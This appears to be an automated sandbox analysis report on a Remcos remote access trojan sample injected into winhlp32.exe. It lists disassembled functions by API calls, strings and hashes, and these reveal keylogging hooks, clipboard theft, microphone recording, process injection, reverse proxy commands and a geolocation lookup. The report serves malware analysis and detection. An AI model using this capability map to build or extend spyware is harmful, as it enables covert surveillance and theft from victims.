                                    • Instruction Fuzzy Hash: FB414F715082019AC215FB61DC52DAEB3F8AE90718F10053FB546A60E2FFB8AE49C65F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                    • __dosmaperr.LIBCMT ref: 0043A8A6
                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                    • __dosmaperr.LIBCMT ref: 0043A8E3
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                    • __dosmaperr.LIBCMT ref: 0043A937
                                    • _free.LIBCMT ref: 0043A943
                                    • _free.LIBCMT ref: 0043A94A
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                    • String ID:
                                    • API String ID: 2441525078-0
                                    • Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                    • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                    • Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
                                    • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • SetEvent.KERNEL32(?,?), ref: 004054BF
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                    • TranslateMessage.USER32(?), ref: 0040557E
                                    • DispatchMessageA.USER32(?), ref: 00405589
                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                    • Opcode Fuzzy Hash: fef61f91b449ae31e274f9846cb3759d0d19ea8c240772b62dae1734d23b140a
                                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenClipboard.USER32 ref: 00416941
                                    • EmptyClipboard.USER32 ref: 0041694F
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: !D@
                                    • API String ID: 2172192267-604454484
                                    • Opcode ID: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                    • Opcode Fuzzy Hash: 014ab2952fb1720400378532343d04f3ca6c69c69b6d94fb269798378f0b3219
                                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                    • String ID:
                                    • API String ID: 297527592-0
                                    • Opcode ID: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                    • Opcode Fuzzy Hash: 1b52e587fb9d9e89c8408f811d16bdaf082f1bab315b69f0c216b55e30adf48b
                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                    • Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
                                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _free.LIBCMT ref: 00448135
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00448141
                                    • _free.LIBCMT ref: 0044814C
                                    • _free.LIBCMT ref: 00448157
                                    • _free.LIBCMT ref: 00448162
                                    • _free.LIBCMT ref: 0044816D
                                    • _free.LIBCMT ref: 00448178
                                    • _free.LIBCMT ref: 00448183
                                    • _free.LIBCMT ref: 0044818E
                                    • _free.LIBCMT ref: 0044819C
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0

                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                    • API String ID: 3578746661-3604713145

                                    APIs
                                    • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                    • __fassign.LIBCMT ref: 0044B479
                                    • __fassign.LIBCMT ref: 0044B494
                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                    • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                    • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                    Similarity
                                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                    • String ID: PkGNG
                                    • API String ID: 1324828854-263838557

                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                    • Sleep.KERNEL32(00000064), ref: 00417521
                                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleep
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 1462127192-2001430897

                                    APIs
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\winhlp32.exe), ref: 0040749E
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                    • API String ID: 2050909247-4242073005

                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                    • waveInStart.WINMM ref: 00401CFE
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID: dMG$|MG$PG
                                    • API String ID: 1356121797-532278878

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891

                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                    • _free.LIBCMT ref: 00445494
                                    • _free.LIBCMT ref: 004454AD
                                    • _free.LIBCMT ref: 004454DF
                                    • _free.LIBCMT ref: 004454E8
                                    • _free.LIBCMT ref: 004454F4
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863

                                    Similarity
                                    • API ID:
                                    • String ID: tcp$udp
                                    • API String ID: 0-3725065008

                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                    • ExitThread.KERNEL32 ref: 004018F6
                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    Similarity
                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                    • String ID: PkG$XMG$NG$NG
                                    • API String ID: 1649129571-3151166067

                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                    • String ID: .part
                                    • API String ID: 1303771098-3499674018

                                    APIs
                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                    • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                    • GetLastError.KERNEL32 ref: 0040A2ED
                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                    • TranslateMessage.USER32(?), ref: 0040A34A
                                    • DispatchMessageA.USER32(?), ref: 0040A355
                                    Strings
                                    • Keylogger initialization failure: error , xrefs: 0040A301
                                    Similarity
                                    • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                    • String ID: Keylogger initialization failure: error
                                    • API String ID: 3219506041-952744263

                                    APIs
                                    • GetForegroundWindow.USER32 ref: 0040A416
                                    • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                    • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                    • GetKeyState.USER32(00000010), ref: 0040A433
                                    • GetKeyboardState.USER32(?), ref: 0040A43E
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                    • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                    • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                    Similarity
                                    • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                    • String ID:
                                    • API String ID: 1888522110-0

                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0

                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm$zD
                                    • API String ID: 2936374016-2723203690

                                    APIs
                                    • _free.LIBCMT ref: 00449212
                                    • _free.LIBCMT ref: 00449236
                                    • _free.LIBCMT ref: 004493BD
                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                    • _free.LIBCMT ref: 00449589
                                    Similarity
                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                    • String ID:
                                    • API String ID: 314583886-0

                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]$xUG$TG
                                    • API String ID: 3554306468-1165877943
                                    • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                    • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID: D[E$D[E
                                    • API String ID: 269201875-3695742444
                                    • Opcode ID: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                    • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                    • Opcode Fuzzy Hash: bc4a191701c62eeb9847f09c94d148ade9b95fc5d58c951cd89fb7ba37de2388
                                    • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                    • __alloca_probe_16.LIBCMT ref: 004511B1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                    • __freea.LIBCMT ref: 0045121D
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID: PkGNG
                                    • API String ID: 313313983-263838557
                                    • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                    • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • _wcslen.LIBCMT ref: 0041B763
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                    • API String ID: 37874593-122982132
                                    • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                    • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                    • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                    • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                    • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                    • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                    Strings
                                    • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleOpen$FileRead
                                    • String ID: http://geoplugin.net/json.gp
                                    • API String ID: 3121278467-91888290
                                    • Opcode ID: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                    • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                    • Opcode Fuzzy Hash: 93fb62275c9c30ece467367bc9d260af9d028c0859994e7c2f4e10a89ee4ed45
                                    • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                    • int.LIBCPMT ref: 00411183
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                    • String ID: (mG
                                    • API String ID: 2536120697-4059303827
                                    • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                    • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000013.00000002.2293523847.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_19_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue
                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    • API String ID: 1866151309-2070987746
                                    • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                    • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
